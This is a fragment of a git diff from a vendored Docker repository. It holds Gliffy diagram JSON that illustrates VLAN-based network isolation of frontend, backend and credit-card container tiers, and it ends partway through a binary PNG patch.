

Frontend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":420.0100878848684,"rotation":0.0,"id":381,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":41,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":382,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":383,"width":98.00597014925374,"height":44.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.10.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":384,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":385,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":382.0,"y":420.0100878848684,"rotation":0.0,"id":376,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":31,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":377,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,
"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":378,"width":98.00597014925374,"height":44.0,"uid":null,"order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.30.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":379,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":380,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":214.0,"y":503.0100878848685,"rotation":0.0,"id":374,"width":135.0,"height":20.162601626016258,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Backend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":376.0,"y":502.0100878848684,"rotation":0.0,"id":373,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Credit Cards

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":627.0,"y":99.94304076572786,"rotation":0.0,"id":364,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":25,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":363,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":342,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-183.0,310.0670471191406],[-183.0,292.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":410.0100878848684,"rotation":0.0,"id":363,"width":144.0,"height":117.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":218.0,"y":341.5100878848684,"rotation":0.0,"id":366,"width":132.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.20

VLAN ID: 20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":297.0,"y":89.94304076572786,"rotation":0.0,"id":356,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":22,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":353,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":343,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-13.0,320.0670471191406],[-13.0,302.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":222.0,"y":420.0100878848684,"rotation":0.0,"id":348,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":349,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":350,"width":98.00597014925374,"height":44.0,"uid":null,"order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6
,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":351,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":352,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":13,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":410.0100878848684,"rotation":0.0,"id":353,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":332.0100878848684,"rotation":0.0,"id":343,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rect
angle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":203.0,"y":307.5100878848684,"rotation":0.0,"id":333,"width":160.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 Interface

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":303.0,"y":240.51008788486845,"rotation":0.0,"id":323,"width":261.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":8,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

802.1Q Trunk - can be a single Ethernet link or Multiple Bonded Ethernet links

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.0,"y":291.0100878848684,"rotation":0.0,"id":290,"width":497.0,"height":80.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":543.5100878848684,"rotation":0.0,"id":282,"width":569.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host: Frontend, Backend & Credit Card App Tiers are Isolated but can still communicate inside parent interface or any other Docker hosts using the VLAN ID

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-33.0,"y":79.94304076572786,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":5,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":345,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":340,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[157.0,330.0670471191406],[157.0,312.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":410.0100878848684,"rotation":0.0,"id":345,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":323.0100878848684,"rotation":0.0,"id":276,"width":531.0,"height":259.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"l
ayerId":"9wom3rMkTrb3"},{"x":19.609892022503004,"y":20.27621073737908,"rotation":355.62347411485274,"id":246,"width":540.0106597126834,"height":225.00000000000003,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":2,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":1.0,"y":99.94304076572786,"rotation":0.0,"id":394,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.5670471191406],[261.0,108.05111187584177]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.0,"y":90.94304076572786,"rotation":0.0,"id":481,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.56704711914062],[261.0,108.05111187584174]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 
0","active":true,"locked":false,"visible":true,"nodeIndex":104}],"shapeStyles":{},"lineStyles":{"global":{"fill":"#999999","stroke":"#38761d","strokeWidth":3,"dashStyle":"1.0,1.0","orthoMode":2}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"14px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117295143,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png new file mode 100644 index 0000000000000000000000000000000000000000..32d95f600e1d0f028e5a354584d7b3eac1639e35 GIT binary patch literal 38837 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 
